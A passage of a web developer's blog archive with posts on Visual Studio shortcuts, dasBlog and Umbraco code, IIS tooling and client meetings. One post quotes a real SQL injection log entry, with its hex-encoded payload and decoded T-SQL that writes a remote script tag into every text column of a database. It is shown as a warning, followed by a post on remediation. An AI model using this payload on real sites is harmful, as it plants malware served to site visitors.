The problem for me (and my mate Chris) is not only that it's limited to the project item but, more importantly, that it means using the mouse -which is something I'm trying to avoid as much as possible. Then I stumbled across a couple of posts which suggested opening Windows Explorer with Visual Studio's External Tools dialog.

They're both great ideas but you still need to use the mouse so I thought I'd take the final step and wire up some keyboard shortcuts. I'll recap the process here as I've added/grouped a few of their settings.

Creating the "External Tools"

There's a little productivity tip here: setting the folder in question as the root of Windows Explorer encourages you to focus on just the work in question (though it can be a little irritating sometimes, so I may "undo" this change later).

Custom #1: Open the current solution item in Windows Explorer

Title: Windows Explorer - Item
Command: explorer.exe
Arguments: /select,"$(ItemPath)"

Custom #2: Open the current Visual Studio project in Windows Explorer

Title: Windows Explorer - Project Directory
Command: explorer.exe
Arguments: /root,"$(ProjectDir)"

Custom #3: Open the current Visual Studio solution in Windows Explorer

We've got a number of projects that have useful files/folders stored in the same folder as the solution file so this one's useful to get quick access to them, I think I'll use this one a lot when dealing with SVN.

Title: Windows Explorer - Solution Directory
Command: explorer.exe
Arguments: /root,"$(SolutionDir)"

Custom #4: Open the current solution's binary (bin) directory in Windows Explorer

Useful when you want to get access to the dll, e.g. to copy it to another folder or upload just the dll to a website.

Title: Windows Explorer - Binary Directory
Command: explorer.exe
Arguments: "$(TargetDir)"

Custom #5: Open the current solution's target build directory in Windows Explorer

This is useful when you have a project that builds to another directory (e.g. a common DLL directory; I'm not sure how many people do this, but I've got a couple of projects that do, so I thought I'd share it).

Title: Windows Explorer - Target Directory
Command: explorer.exe
Arguments: "$(BinDir)"

In all instances you can leave the Initial Directory field empty.

Note: On a couple of the directory related commands I've set the "/root" argument, a useful little productivity tip I learnt a while ago to stop you navigating away from your work. Irritatingly I've not found a way of using the /select and /root commands together. It would also be nice to say "Open the bin folder and set the root to the project folder" but again I've not found a way.

If you're interested in the arguments I'm using there, check out the Microsoft Support article about How To Customize the Windows Explorer Views in Windows XP (these also work in Vista). Alternatively you can read more about the Visual Studio macros for build commands here (some of which are global I believe). I'm interested to see the use of $(TargetDir): although it'll be useful for non-web projects, using Web Deployment Projects might make it irrelevant for you.

You should now have 5 new items in your Tools' toolbar:

Wire up the keyboard shortcuts

As mentioned earlier, I want keyboard shortcuts but if you want toolbar icons, you should checkout the end of this post.

Open up the Keyboard settings within the Visual Studio Option dialog (Tools -> Options -> Environment -> Keyboard) -you may need to select the "Show all settings" checkbox in the bottom left of the Options dialog to see the Keyboard option.

In the Show commands containing field, enter "Tools.ExternalCommand" to list the set of commands. Irritatingly, each command is just labelled "Tools.ExternalCommand#", so this bit will require a little thinking on your behalf. My commands are #2-6 (#1 is the Dotfuscator Community Edition command).

I would then wire up the following shortcuts (I've set them up Globally for convenience):

Tools.ExternalCommand2 (Current Item): Ctrl+E, I
Tools.ExternalCommand3 (Current Project): Ctrl+E, P
Tools.ExternalCommand4 (Current Solution): Ctrl+E, S
Tools.ExternalCommand5 (Bin dir): Ctrl+E, B
Tools.ExternalCommand6 (Target dir): Ctrl+E, T

To enter these shortcuts simply press the first combination (in this case Ctrl+E), then press the second key (I -item, P -project, S -solution, B -binary, T -target). I found that a couple of these were already wired up to ReSharper and Pex which is a pain, but I don't tend to use those particular shortcuts so I just overrode them.

Now you should be able to press Ctrl+E followed by I and get your current item in Explorer.

It'd be nice if I could get it to use a single instance of Explorer and just refocus the items (on another key combo as that's not always the desired action).

Update: After using it a little, I've noticed that in my projects, I had the Bin/TargetDir the wrong way around (now corrected).
Monday, March 02, 2009 11:09:25 AM (GMT Standard Time, UTC+00:00)  #    Disclaimer  |  Comments [0]  | 
# Friday, February 27, 2009

If you've been following my blog you'll know that I've been raving about error reporting within ASP.Net (you can see my ASP.Net Error Reporting category for a couple of them if you like) but until now it's been limited to those sites that you have access to the global.asax file.

One of the irritations I've found with Umbraco and dasBlog is that I don't get notified of errors as they're just logged to a text file/database somewhere. This is fine if you run 2 or 3 sites but we manage too many to check them all everyday. Instead we rely on email error notifications which until today have been a PITA to integrate into Umbraco.

Today I'd like to introduce to you Error Handling v2.0 which instead of relying on the global.asax file for the error hooks, uses a HttpModule which means you can install it into any existing/pre-built application such as Umbraco and dasBlog.

Adding it into the site is simple: you'll need to register the module in the web.config file and add the configuration section. A sample (cut-down) web.config is below:

<?xml version="1.0"?> 
<configuration> 
    <configSections> 
        <section name="tsdErrorsConfigSection" allowExeDefinition="MachineToApplication" restartOnExternalChanges="true" type="System.Configuration.NameValueFileSectionHandler, System, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" /> 
    </configSections> 
 
    <tsdErrorsConfigSection file="ErrorHandling.config"/> 
 
    <system.net> 
        <mailSettings> 
            <smtp from="you@yourdomain.com"> 
                <network host="127.0.0.1" port="25" /> 
            </smtp> 
        </mailSettings> 
    </system.net> 
 
    <system.web> 
        <httpModules> 
            <add name="ErrorModule" type="TheSiteDoctor.ErrorHandling.ErrorModule, TheSiteDoctor.ErrorHandling" /> 
        </httpModules> 
    </system.web> 

<!--  
IIS 7 Settings 
    <system.webServer> 
        <validation validateIntegratedModeConfiguration="false" /> 
        <modules> 
            <add name="ErrorModule" type="TheSiteDoctor.ErrorHandling.ErrorModule, TheSiteDoctor.ErrorHandling" /> 
        </modules> 
    </system.webServer> 
-->
</configuration>

Then you'll need to check all the settings -I recommend storing these in another .config file for clarity's sake. Make sure you've configured your SMTP settings and you should be good to go.

If you want to test your settings, I've included a test page for you that will check your settings and show you the defaults if you've not set them. I've got this running now on a couple of Umbraco and dasBlog installs without an issue.

There's also a useful logging system in it which I'll look to overview in a later post but if you want to see it, check out the included aspx file.

Download ErrorHandling_v2.0.zip (25Kb)

If you do use this code I'd be interested to hear how you get on. I think it requires a little more refinement in some areas but it's pretty robust.

Enjoy.

Friday, February 27, 2009 3:51:13 PM (GMT Standard Time, UTC+00:00)  #    Disclaimer  |  Comments [2]  | 
# Tuesday, February 17, 2009

One of the issues I had with John Forsythe's Recent Comments macro for DasBlog was that the dasBlog recent comments weren't ordered by date (descending). I found that as people commented on older posts they were getting buried, which irritated me as many were still very valid comments.

The fix was actually fairly simple, it was just a matter of adding a sort and, thanks to lambda expressions, this is something we can do fairly simply. If you want to add recent comments to your dasBlog installation, use the following macro:

Recent Comments Macro

public virtual Control RecentComments(int count, int adminComments, int trimTitle, int trimContent, int trimAuthor, bool showTitle, bool showCommentText, bool showCommentCount)
{
    int commentsToShow;
    int totalComments;

    CommentCollection allComments = this.requestPage.DataService.GetAllComments();
    totalComments = allComments.Count;

    //Sort the comments in ascending date order (the display loop below walks backwards, so the newest comments are rendered first)
    allComments.Sort((c1, c2) => c1.CreatedUtc.CompareTo(c2.CreatedUtc));

    if (!this.requestPage.HideAdminTools && SiteSecurity.IsInRole("admin"))
        commentsToShow = totalComments - adminComments;
    else
        commentsToShow = totalComments - count;

    if (commentsToShow < 0)
        commentsToShow = 0;

    StringBuilder sb = new StringBuilder();

    sb.AppendLine("<div class=\"recentComments\">");

    if (showCommentCount)
        sb.AppendFormat("<div class=\"totalComments\">Total Comments: {0}</div>", totalComments);

    sb.AppendLine("<ul class=\"comments\">");

    #region Loop through the comments

    for (int i = totalComments - 1; i >= commentsToShow; i--)
    {
        Comment current = allComments[i];

        bool showComment;
        if (!current.IsPublic || (current.SpamState == SpamState.Spam))
        {
            if (!this.requestPage.HideAdminTools && SiteSecurity.IsInRole("admin"))
            {
                showComment = true;
            }
            else
            {
                showComment = false;
                if (commentsToShow > 0)
                    commentsToShow--;
            }
        }
        else
        {
            showComment = true;
        }

        if (showComment)
        {
            if ((current.SpamState == SpamState.Spam))
                sb.Append("<li class=\"spam\">");
            else if (!current.IsPublic)
                sb.Append("<li class=\"hidden\">");
            else
                sb.Append("<li>");

            string link = String.Format("{0}{1}{2}", SiteUtilities.GetCommentViewUrl(current.TargetEntryId), "#", current.EntryId);
            string title = current.TargetTitle;
            string desc = current.Content;
            string author = current.Author;

            if (showTitle)
            {
                sb.AppendFormat("<div class=\"recent{0}CommentsTitle\"><a href=\"{1}\">",
                    current.SpamState,
                    link
                    );

                if ((title.Length > trimTitle) && (trimTitle > 0))
                    sb.AppendFormat("RE: {0}...", title.Substring(0, trimTitle));
                else
                    sb.AppendFormat("RE: {0}", title);

                sb.Append("</a></div>");
            }

            if (showCommentText)
            {
                sb.AppendFormat("<div class=\"recentCommentsContent\"><a href=\"{0}\">",
                    link
                    );

                if ((desc.Length > trimContent) && (trimContent > 0))
                {
                    sb.Append(desc.Substring(0, trimContent));
                    sb.Append("...");
                }
                else
                {
                    sb.Append(desc);
                }

                sb.Append("</a></div>");
            }

            sb.Append("<div class=\"recentCommentsAuthor\">");

            if ((author.Length > trimAuthor) && (trimAuthor > 0))
            {
                int num3 = (trimAuthor > author.Length) ? author.Length : trimAuthor;
                sb.Append("by " + author.Substring(0, num3));
                sb.Append("...");
            }
            else
            {
                sb.Append("by " + author);
            }
            sb.Append("</div></li>");
        }
    }
    #endregion

    sb.AppendLine("</ul>");
    sb.AppendLine("</div>");

    return new LiteralControl(sb.ToString());
}

I've since been working on extending it further so you can add a "All Comments" link which I'll post up later as it needs a little more work :)

If you want this wrapped up as a DLL let me know and I'll upload it.

Update 26th Feb 2009: You can download the dll here (it's also got a few other things in there if you want to look around).

Update 27th Feb 2009: I noticed that the above code was messing up every now and again so I've updated it to use Linq instead which seems to work well. I've updated the DLL but not the source yet.

Tuesday, February 17, 2009 9:25:05 AM (GMT Standard Time, UTC+00:00)  #    Disclaimer  |  Comments [1]  | 
# Wednesday, January 21, 2009

I thought I'd share this as it's something I've been thinking about trying for a while. Umbraco is great but sometimes you want the default document selected when creating a page to be one that isn't the alphabetically first one.

To work around this I tend to prefix the important Umbraco document types with a symbol (or you could use 1. etc I guess) but if instead you use a space (" ") before the name of your document type, Umbraco will place it at the top of the list for you.

The nice thing to note here is that they obviously trim the name first so it just appears as "Text Page" rather than " Text Page".

I found this out on our latest site which is just about to go live: www.nhshistopathology.net -check it out and let me know what you think.

Enjoy!

Wednesday, January 21, 2009 7:59:39 PM (GMT Standard Time, UTC+00:00)  #    Disclaimer  |  Comments [4]  | 
# Sunday, January 18, 2009

This is the second time I've come across the error "Value cannot be null. Parameter name: type" when using ASP.Net Membership Profiles.

Profiles are great: they allow you to store little pieces of information, e.g. a user id (an integer reference to your database), against the user's User object. You can then use that as a property of the User, which can get you out of a bind or two.
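
As a sketch of the idea (the property name and type here are purely illustrative), a profile property is declared in web.config and the provider then persists it per user:

```xml
<system.web>
  <profile>
    <properties>
      <!-- hypothetical property: an integer id pointing at your own database -->
      <add name="UserId" type="System.Int32" defaultValue="0" />
    </properties>
  </profile>
</system.web>
```

In a Web Site project ASP.Net generates a strongly typed Profile class from this, which is exactly the generated code (App_Code.compiled) that the Web Deployment Project setting below interferes with.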

However, since switching to Web Deployment Projects to get around a few issues with multiple-environment configuration switching, I started to get "Value cannot be null. Parameter name: type". After a little Googling around, I found that it relates to the "Treat as library component (remove the App_Code.compiled file)" setting under the property pages.

Un-checking the box sorts all your woes :)

Sunday, January 18, 2009 6:49:53 PM (GMT Standard Time, UTC+00:00)  #    Disclaimer  |  Comments [1]  | 
# Friday, November 07, 2008

This came through to one of our clients today, I thought I'd share it as I've not seen it before and it made me chuckle. Note the placeholder: <Online since>

Thought you might like to share it with your clients :)

Friday, November 07, 2008 1:48:20 PM (GMT Standard Time, UTC+00:00)  #    Disclaimer  |  Comments [0]  | 
# Wednesday, November 05, 2008

We've just moved a couple of our sites onto a new server and have intermittently started to receive the error "The remote host closed the connection. The error code is 0x80072746.", usually around the same time as "Timeout expired.  The timeout period elapsed prior to completion of the operation or the server is not responding.".

As the infrastructure hadn't changed we were able to rule out network issues, hardware issues (it was an upgrade) and nothing had changed on the code level so we put it down to the new backup routine.

On a little Googling, I found a few sites pointing to (among other things) the request length and execution time, which got me thinking: this particular site sends and retrieves a lot of data and it could be maxing out the request. After a little more digging I found this article from Microsoft about the httpRuntime element, and I quote:

This time-out applies only if the debug attribute in the compilation element is False. To help to prevent shutting down the application while you are debugging, do not set this time-out to a large value.

Although I didn't recall making any changes to the site, when updating the database configuration settings I did change the compilation element's debug attribute to false. So far, increasing the executionTimeout value appears to have fixed the issue.
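
The change itself is a one-liner in web.config. This is a sketch only -the values below are illustrative, not what we actually used (the default executionTimeout is 110 seconds and, as the quote above notes, it is only enforced when debug is false):

```xml
<system.web>
  <compilation debug="false" />
  <!-- executionTimeout is in seconds; maxRequestLength is in KB -->
  <httpRuntime executionTimeout="300" maxRequestLength="10240" />
</system.web>
```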

Wednesday, November 05, 2008 2:03:40 PM (GMT Standard Time, UTC+00:00)  #    Disclaimer  |  Comments [1]  | 
# Thursday, September 25, 2008

It's important when going into any meeting with a client that you prepare (everyone knows the old motto "Failing to prepare is preparing to fail") but how can you do that? First of all, consider what sort of meeting it is, and find out who's going to the meeting and why they're there. Once you have this information you're good to go.

The first client meeting

Although you may be a little nervous at the first couple of meetings, this is perfectly normal, just remember that they've asked you there so they're interested in what you have to say -after all, you're the expert!

It's very likely that the client will want to know more information about your company (not you!) so having a short synopsis of your company that can act as a base is very important. For instance, The Site Doctor has something along the lines of:

The Site Doctor specialises in creating bespoke web based applications centred on your business requirements. We work with some of the world's largest and most successful organisations in both the public and private sectors as well as a wide selection of SMEs.

By combining specialist technology skills, with excellence in design, usability, accessibility and a unique business management process, we are able to deliver results-driven solutions including websites, intranets, Content Management Systems, enterprise portals, business applications and extranets.

As well as developing major applications, our skills in marketing and communications ensure that we deliver a consistent message across a number of interactive communication channels and also integrate your objectives within an off-line environment.

Since establishing The Site Doctor, we have encouraged all those involved to participate in the relevant online communities to not only improve their own knowledge and expertise but also give something back and help further others' careers.

To be fair, this monologue changes depending on who we're meeting and the general feeling of the meeting; for instance, if we're addressing a panel we might leave off the SME part and replace it with a list of clients, as panels are more likely to be interested in your larger work.

Whatever your monologue is, it should be short and concise (I can digress somewhat when introducing The Site Doctor); make sure it's no longer than two minutes as, if they want to know more, they'll ask.

Make sure you've prepared a short list of questions for the client either about themselves or the project they have in mind, some of these you might already have answers to so prepare questions on the responses. Here are a couple of standard ones:

  • What are you looking to achieve with this project -do you have any goals/objectives already defined such as number of visitors, % increase in sales etc?
  • Similar to above, a good question is "What would make you consider this project a success?" -then link it to their targets above
  • Do you have any literature, designs or mood boards that would help with this project already prepared?
  • What are your timescales for this project?
  • Are there any events or meetings that you would like to have this project completed in time for? (99 times out of 100 there's a trade show coming up that they won't tell you about without being prompted)
  • Have you thought about a budget for this work? (They'll most likely say "no, you tell us what it'll cost and we'll decide" -there's a way around that which I'll blog about later)

If you manage to get this information (and any other relevant information) you're off to a good start with your project! Don't fret too much though if you can't get all the information or you don't manage to get the budget from the client the first time around, there are ways around it.

The most important thing about the first client meeting is that both parties feel at ease with one another as this will form a good base to build the project on. If you're liked by the client they're more likely to do business with you -especially if they have to pitch you to their superiors.

My next post will cover the project meetings and client feedback/sign-off meetings. At some point I'll blog about my successful networking tips and how to get a budget out of a client, but that's enough for today!

What do you say when in your first meeting? Do you have any tips for what to say in meetings? Leave me a comment, I'd love to hear your thoughts.

Thursday, September 25, 2008 9:34:48 AM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [0]  | 
# Monday, July 28, 2008

I've been wondering for a while how Google has managed to find a couple of hidden pages. Although they were securely locked down we noticed a few rejected GoogleBot requests in the audit logs. We put this down to the users having a Google toolbar installed but today we got an error from the new Avant Garde hair salons site that's just gone into beta testing which got me thinking.

This particular link is hidden behind a form post and within a jQuery call (to track an action) so not something the GoogleBot has easy access to. I know they're getting more clever but not *that* clever! We started getting the errors shortly after adding the final Google Analytics code so the only conclusion I can come to is that they're not just registering the URLs for reporting purposes but they're also using them to crawl additional pages.

Does anyone know if they use the URLs tracked in Google Analytics to find new pages? All I can say is if this is the case, you better make sure your "secure" pages check the access permissions on a page level!

Monday, July 28, 2008 2:19:41 PM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [0]  | 
# Friday, July 25, 2008

Exactly a year ago today I posted a little application that output the sites in IIS to a text file and, as Lars asked for the source a few days ago, I thought it would be a nice thing to release it exactly a year later.

I didn't plan it that way, it just happened! Cool :)

Identify IIS Sites and Log File locations for WWW and FTP source

using System;
using System.DirectoryServices;
using System.IO;
using System.Collections;

namespace IISSites
{
    class Program
    {
        static string fileToWrite = String.Empty;

        [STAThread]
        static void Main(string[] args)
        {
            fileToWrite = String.Format("IISExport{0:dd-MM-yyyy}.txt", DateTime.Today);
            if (args != null && args.Length > 0)
            {
                fileToWrite = args[0];
            }

            SortedList www = new SortedList();
            SortedList ftp = new SortedList();
            try
            {
                const string FtpServerSchema = "IIsFtpServer"; // Case Sensitive
                const string WebServerSchema = "IIsWebServer"; // Case Sensitive
                string ServerName = "LocalHost";
                DirectoryEntry W3SVC = new DirectoryEntry("IIS://" + ServerName + "/w3svc", "Domain/UserCode", "Password");

                foreach (DirectoryEntry Site in W3SVC.Children)
                {
                    if (Site.SchemaClassName == WebServerSchema)
                    {
                        string LogFilePath = System.IO.Path.Combine(
                            Site.Properties["LogFileDirectory"].Value.ToString(),
                            "W3SVC" + Site.Name);
                        www.Add(Site.Properties["ServerComment"].Value.ToString(), LogFilePath);
                    }
                }

                DirectoryEntry MSFTPSVC = new DirectoryEntry("IIS://" + ServerName + "/msftpsvc");
                foreach (DirectoryEntry Site in MSFTPSVC.Children)
                {
                    if (Site.SchemaClassName == FtpServerSchema)
                    {
                        string LogFilePath = System.IO.Path.Combine(
                            Site.Properties["LogFileDirectory"].Value.ToString(),
                            "MSFTPSVC" + Site.Name);
                        ftp.Add(Site.Properties["ServerComment"].Value.ToString(), LogFilePath);
                    }
                }
                int MaxWidth = 0;
                foreach (string Site in www.Keys)
                {
                    if (Site.Length > MaxWidth)
                        MaxWidth = Site.Length;
                }
                foreach (string Site in ftp.Keys)
                {
                    if (Site.Length > MaxWidth)
                        MaxWidth = Site.Length;
                }
                OutputIt("Site Description".PadRight(MaxWidth) + "  Log File Directory");
                OutputIt("".PadRight(79, '='));
                OutputIt(String.Empty);
                OutputIt("WWW Sites");
                OutputIt("=========");
                foreach (string Site in www.Keys)
                {
                    string output = Site.PadRight(MaxWidth) + "  " + www[Site];
                    OutputIt(output);
                }
                if (ftp.Keys.Count > 0)
                {
                    OutputIt(String.Empty);
                    OutputIt("FTP Sites");
                    OutputIt("=========");
                    foreach (string Site in ftp.Keys)
                    {
                        string output = Site.PadRight(MaxWidth) + "  " + ftp[Site];
                        OutputIt(output);
                    }
                }
            }
            // Catch any errors
            catch (Exception e)
            {
                Console.WriteLine("Error: " + e.ToString());
            }
            finally
            {
                Console.WriteLine();
                Console.WriteLine("Press enter to close/exit...");
                Console.Read();
            }
        }

        static void OutputIt(string lineToAdd)
        {
            Console.WriteLine(lineToAdd);

            if (!String.IsNullOrEmpty(fileToWrite))
            {
                // Append the line to the export file, closing the writer even if the write fails
                using (StreamWriter SW = File.AppendText(fileToWrite))
                {
                    SW.WriteLine(lineToAdd);
                }
            }
            else
            {
                Console.WriteLine("fileToWrite is null or String.Empty, please supply a value and try again.");
            }
        }
    }
}
Friday, July 25, 2008 3:52:37 PM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [1]  | 
# Saturday, July 05, 2008

I've been re-working our new SVN structures recently as I'm now starting to understand how it works, but one of the issues I had was moving the files/folders from a previous SVN directory.

PowerShell is great if you understand it (which I'm also learning) so I thought I would share this little script with you. It just loops through the folders and removes all those named _svn. I found the original script from Wyatt Lyon Preul, who complained about its length, but from what I can tell you can condense it down to:

gci $folder -fil '_svn' -r -fo | ? {$_.psIsContainer} | ri -fo -r

I'm not that great with PowerShell yet but I hope that helps someone :)

WARNING: As ever, in case I'm wrong (it happens!), test it first on a folder you don't mind losing!
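If you need to do the same from a Unix-like shell rather than PowerShell, a rough equivalent using find would be something like the following -this is my own untested sketch, so the same warning applies:

```shell
# Delete every directory named _svn below $folder.
# -prune stops find descending into a directory we're about to delete.
folder=.
find "$folder" -type d -name _svn -prune -exec rm -rf {} +
```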
Saturday, July 05, 2008 4:25:32 PM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [0]  | 
# Wednesday, June 25, 2008

As requested on the forum, we've got a map to try and work out where it should be placed, if you want to come along get yourself added: http://tinyurl.com/3oaf8x

Instructions from Google:

Adding and Editing Placemarks

To add a placemark to your map:

  1. Create or open a map.
  2. Click the Placemark button. Your cursor changes into a placemark icon with an "X" crosshairs. The crosshairs indicate where the placemark will fall.
  3. Move the cursor to the appropriate location. If you want to dismiss this placemark, press the Escape key.
  4. Click your mouse button to place your placemark. It should bounce into place.
  5. Add a title and description.
  6. You can also change the icon for your placemark by clicking the icon in the top right corner of the info window, or add your own icon.
  7. Click OK to save your placemark.
To move or edit a placemark:
  1. Click Edit in the left panel.
  2. Drag and drop the appropriate placemark to the new location. Note that you can only edit or move placemarks on your maps, not others.
  3. To edit a placemark's title or description, click on it to open the info window. Edit the title and description and click OK.
  4. Click Done in the left panel when you are finished.
Wednesday, June 25, 2008 10:25:00 AM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [0]  | 
# Saturday, June 21, 2008

In a previous post about CodeGarden 08, I asked people to get in touch if they'd be interested in a UK Umbraco meet up. I've had a fair few people get in touch so I think it's something worthwhile pursuing further. The next stage from my POV is working out the location and potential content of the meet, so I thought I'd open it up to the floor.

With the forthcoming DDD7, I thought it might provide a ready-built platform that we could use, but I agree with Phil that DDD7 may not be suitable for a multitude of reasons.

As I've had people from the South West and Scotland voice an interest, I don't think it'll suit the majority of people to have it based in London, so I suggest basing it in the Midlands -probably Birmingham as it's easy to get to (M6 from the North, M4 from London, M5 from the South -or train!) and there are plenty of places to have the meet.

As regards the format/content of the meet, does anyone have any suggestions? We could follow Niels' and Per's open format or we could have a more structured theme. I've not given too much thought to subject matter yet but here's what I have come up with so far:

  • An introduction to Umbraco and what it is (many of the people I've spoken to have only just started using Umbraco)
  • Examples of how Umbraco can be used
  • More advanced Umbraco functionality (membership etc)
  • Getting to grips with XSLT
  • How to sell Umbraco to your clients

So that's where I've got to so far, does anyone have anything to add?

BTW the logo is just a working logo atm, need to have Niels approve it ;)

Update: I've posted about a UK Umbraco meet on the Umbraco forums here

Saturday, June 21, 2008 12:17:58 AM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [4]  | 
# Thursday, May 29, 2008

Doug Setzer posted this comment in response to my recent "A seriously elegant SQL Injection" post and I thought it may be of interest to others so have promoted it to a post...


Well, I'll step up and say that I am the "mate" who had this done.  Tim's right - *always* sanitize your inputs.  In my defence, this was a site that I inherited from a previous contractor.  I'm not entirely absent of blame, I still should have done a security sweep through the code.

I'd like to document the steps that I went through once this was identified to try and avoid this kind of thing in the future.

  1. Edit every web page that executes a query to sanitize any parameters that are passed in.  Since the site was classic ASP, I used my "SQLStringFieldValue" function:
    www.27seconds.com/kb/article_view.aspx?id=50
  2. Modify the DB user account that is used to have *read only* access to the database
  3. Modify the pages that DO write to the database to have *read/write* access to the specific tables that are being changed.  This limits the number of places that SQL Injection can occur to a smaller set than was previously possible.  I still sanitize all of my input, but I'm extra spastic in these database calls.
  4. Add database auditing (triggers writing to mirror tables with audit event indicator & date/time) to see when data changes occur.  This is still problematic with the pages that have "write" permissions to the tables, but again- that footprint is much smaller.
    My future plans are to move to a view/stored procedure based architecture.  I can then limit write permissions to just the stored procedures and read permissions to just the views.  My grand gusto plans are to move to using command objects & parameters, but I'd sooner re-write the entire site.

Although Doug's attack wasn't the same nihaorr1.com attack that's going around atm, it was similar, so I imagine others will find this useful.

It still amazes me how many developers fail to sanitise strings. Only last week I came across another site (in PHP) that was allowing simple SQL injections to be used to log into its administration system. It was down to a problem with the sanitisation routine, but why not at least check your site before it goes live? It takes 2 minutes to check and even less to fix...

For those of you who need a few pointers, there's a good discussion or two about sanitising strings on the 4 Guys From Rolla site.
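For what it's worth, sanitising is a second line of defence at best; the robust fix is to stop building SQL from strings altogether and use parameterised queries, where user input is bound as data rather than concatenated into the statement. A minimal sketch (in Python with sqlite3 purely for illustration -the table and column names are made up, and ADO.NET command parameters or PHP prepared statements follow the same pattern):

```python
import sqlite3

# Hypothetical demo table -names invented for illustration only.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
conn.execute("INSERT INTO news (id, title) VALUES (1, 'Hello')")

# The user's input is bound as a parameter, never concatenated into the SQL,
# so an injection attempt is treated as a harmless literal value.
news_id = "1; DROP TABLE news"
rows = conn.execute("SELECT title FROM news WHERE id = ?", (news_id,)).fetchall()
print(rows)  # [] -the payload matches nothing and executes nothing

rows = conn.execute("SELECT title FROM news WHERE id = ?", (1,)).fetchall()
print(rows)  # [('Hello',)]
```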

Thursday, May 29, 2008 3:32:33 PM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [2]  | 
# Wednesday, May 28, 2008

Having been subject to a recent hack myself I can sympathise with one of my mates who had a SQL injection attack succeed on one of his sites earlier today. Admittedly mine was due to poor internal maintenance whereas this is almost a piece of art...

This is an extract from the IIS log file:

2008-05-20 21:21:28 W3SVC1 xxx.xxx.xxx.xxx POST /news_detail.asp newsID=37;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F0039006900350074002E0063006E002F0061002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F00530
0450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);-- 80 - 221.130.180.215 Mozilla/3.0+(compatible;+Indy+Library) - www.domain.com 200 0 0

This works out to:

DECLARE @T varchar(255), @C varchar(255) 
DECLARE Table_Cursor
CURSOR FOR 
select
    a.name,b.name 
from
    sysobjects a,syscolumns b 
where 
    a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) 

OPEN Table_Cursor 
FETCH NEXT 
FROM  Table_Cursor INTO @T,@C 
WHILE(@@FETCH_STATUS=0)

    BEGIN
        exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://hackersscriptdomain.cn/a.js></script>''')
        FETCH NEXT FROM  Table_Cursor INTO @T,@C 
    END 
CLOSE Table_Cursor 

DEALLOCATE Table_Cursor

Very nice :) (though I can't condone hacking -no matter how elegant it is!)

p.s. The moral of the story is Always sanitise your strings -it's easy!

Wednesday, May 28, 2008 5:46:49 PM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [1]  | 
# Wednesday, April 30, 2008

Despite all the doom and gloom surrounding the pending credit crunch, we're hiring as work is piling in and we need help :). So if you're a developer, designer, sales person, marketing guru -or you're just plain bored check out The Site Doctor's vacancies page for the great posts currently up for grabs!

Not sure why you should come and work with us? There are way too many reasons to list in one go but here are my top 5:

  • You'll have a great boss (ok I'm a touch biased)
  • We have 20% time (every Friday we down tools and do something cool -that doesn't relate to the main projects you're working on at the time -more about that another day)
  • We're committed to your development and will fund courses etc
  • There are bonuses to be had for referrals and working hard!
  • You get your Birthday as an additional bank holiday so you never need to worry about booking it off again!

Oh and there's free Tea and Coffee -so I guess that's 6 reasons to get in touch.

For more information about the posts available (more being added later this week) check out The Site Doctor vacancies page.

Wednesday, April 30, 2008 4:18:00 PM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [0]  | 
# Monday, March 10, 2008

Multipack's new logo - based on Birmingham's Bull So Saturday was another chance to meet up with all the Multipack guys in a recently restructured Multipack -same place (The Old Joint Stock in Birmingham), same time (second Saturday of the month). Personally I think it's a good move as the numbers were well up on normal with lots of lovely new Multipackers (I'm no longer the n00bie ;)) from all sorts of interesting backgrounds.

It's great that Multipack is slowly becoming more recognised; at Saturday's meet, for example, Underscore veteran Darren Beale trekked up from Worcester, which was nice as I could finally put a face to the name. Hopefully over the next few months, with a little more self-promotion and this easy-to-remember location/date, we'll get more new members.

If you're not sure about coming along just yet, check out the website www.multipack.co.uk and get to know a few of the guys. Alternatively there's a mailing list -http://groups.google.com/group/multipack -and an IRC channel (irc.freenode.net, port 6667, #multipack) so there are plenty of ways to join in.

Monday, March 10, 2008 12:58:05 PM (GMT Standard Time, UTC+00:00)  #    Disclaimer  |  Comments [0]  | 
# Thursday, March 06, 2008

Somewhat behind the original schedule we've finally launched the new company website!

